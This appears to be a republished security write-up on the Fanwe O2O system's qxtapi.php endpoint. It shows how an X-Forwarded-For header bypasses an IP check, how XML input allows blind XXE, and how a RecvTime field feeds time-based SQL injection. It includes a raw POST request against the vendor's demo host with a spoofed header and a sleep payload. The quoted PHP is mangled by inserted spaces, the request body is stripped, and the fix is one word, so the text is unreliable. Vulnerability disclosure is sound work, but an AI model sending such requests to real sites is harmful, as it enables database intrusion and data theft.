Fanwe O2O commercial system SQL injection vulnerability + XXE entity Injection

Source: Internet
Author: User

Fanwe O2O commercial system SQL injection vulnerability + XXE entity Injection

Fanwe O2O, demo site address: http://o2odemo.fanwe.net//cpapi/qxtapi.php

define("FILE_PATH","/cpapi");require_once '../system/system_init.php';$ip = CLIENT_IP;$xml = file_get_contents('php://input');if($ip!='221.179.180.156' || $xml==""){ header("Content-Type:text/html; charset=utf-8"); echo "·Ç·¨·ÃÎÊ"; exit;}$xml = str_replace(array("/r/n", "/r", "/n"), "", $xml);$xml_arr = simplexml_load_string($xml);


The above code. IP address verification can be bypassed using XFF, and simplexml_load_string is directly called to parse the POST string, resulting in XXE entity injection. Because there is no output later, here is a "Blind note", Blind XXE. I tested the official demo, but the data packet was not sent out. There may be many reasons (whether to support the Internet or whether to restrict XML entities at the underlying layer). I succeeded locally. Here we read the web logs that the file passes to me through base64:

This is not the focus. Continue to look at the code below. SQL injection is the focus:

$ Xml_arr = simplexml_load_string ($ xml); $ SrcMobile = $ xml_arr-> Body-> Message-> SrcMobile; $ Content = $ xml_arr-> Body-> Message-> Content; $ RecvTime = $ xml_arr-> Body-> Message-> RecvTime; $ arr = explode ("-", $ Content); $ prefix = $ arr [0]; if ($ prefix! = 'U' & $ prefix! = 'V') {if (log_coupon ("", "SMS content :". $ Content, $ RecvTime) & $ SrcMobile) {$ msg_data ['dest'] = $ SrcMobile; $ msg_data ['send _ type'] = 0; $ msg_data ['content'] = "SMS format error"; $ msg_data ['send _ time'] = 0; $ msg_data ['is _ send'] = 0; $ msg_data ['create _ time'] = NOW_TIME; $ msg_data ['user _ id'] = 0; $ msg_data ['is _ html'] = 0; $ GLOBALS ['db']-> autoExecute (DB_PREFIX. "deal_msg_list", $ msg_data); // insert echo "OK"; exit ;}}


We can see that the content read from xml is passed into the log_coupon function. Follow up and see:

Function log_coupon ($ coupon_sn, $ msg, $ query_id = '') {$ data = array (); $ data ['coupon _ sn '] = $ coupon_sn; $ data ['msg '] = $ msg; $ data ['query _ id'] = $ query_id; $ data ['create _ time'] = NOW_TIME; if ($ GLOBALS ['db']-> getOne ("select count (*) from ". DB_PREFIX. "coupon_log where query_id = '". $ query_id. "'") = 0) {$ GLOBALS ['db']-> autoExecute (DB_PREFIX. "coupon_log", $ data); // insert return true;} else {return false ;}}


It can be seen that query_id (that is, the RecvTime in XML) is directly introduced into the SQL statement. This demo station can demonstrate the latency injection. POST the following data packets:

POST /cpapi/qxtapi.php HTTP/1.1Host: o2odemo.fanwe.netAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 147X-FORWARDED-FOR: 221.179.180.156133222211111231230'|sleep(5)#


The result is displayed after a delay of 5 seconds. Write a script to run the database username. See test code.

Solution:

Filter
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.